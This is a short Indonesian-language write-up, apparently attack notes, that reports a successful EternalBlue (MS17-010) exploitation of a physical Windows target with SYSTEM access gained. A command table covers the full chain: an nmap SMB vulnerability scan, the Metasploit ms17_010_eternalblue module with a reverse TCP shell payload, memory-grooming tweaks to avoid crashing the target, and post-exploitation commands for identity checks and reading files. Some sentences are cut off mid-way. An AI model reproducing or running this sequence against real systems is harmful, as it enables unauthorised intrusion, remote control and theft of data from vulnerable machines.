Status Akhir: 🚀 EXPLOIT SUCCESSFUL | 👑 SYSTEM ACCESS GAINED
Scope: Scanning Critical Vulns, Troubleshooting Memory Instability (BSOD) & Remote Code Execution (RCE)
Penetrasi dilakukan pada target fisik dengan urutan sebagai berikut:
NT AUTHORITY\SYSTEM) karena exploit bekerja pada level kernel.GroomSize dan mengganti EXITFUNC ke mode thread.timeout pada tool scanning/exploit adalah keharusan agar koneksi tidak terputus (Died).| Command | Struktur (Subjek + Predikat + Objek) | Penjelasan Logika |
|---|---|---|
nmap -Pn -p 445 --script vuln [IP] |
nmap + No-Ping + Check Vuln | Memastikan apakah pintu SMB target benar-benar memiliki celah EternalBlue. |
msfconsole |
msf + console | Membuka kerangka kerja Metasploit untuk memulai serangan. |
use exploit/windows/smb/ms17_010_eternalblue |
use + nama modul | Memilih modul eksploitasi spesifik untuk Windows 7/Server 2008. |
set PAYLOAD windows/x64/shell/reverse_tcp |
set + payload ringan | Menggunakan shell biasa agar target tidak crash (BSOD) akibat beban memori. |
set EXITFUNC thread |
set + exit function | Menginstruksikan exploit untuk menutup celah memori secara halus agar sistem tetap hidup. |
set GROOMSIZE 5 |
set + alokasi memori | Memperkecil jumlah data "grooming" di memori target untuk mencegah kegagalan sistem. |
exploit |
exploit / run | Menjalankan serangan ke IP target yang sudah dikonfigurasi. |
whoami |
who + am + i | Verifikasi identitas; jika muncul system, berarti kontrol penuh telah didapat. |
type [file].txt |
type + nama file | Perintah CMD Windows (setara cat di Linux) untuk membaca isi file teks. |


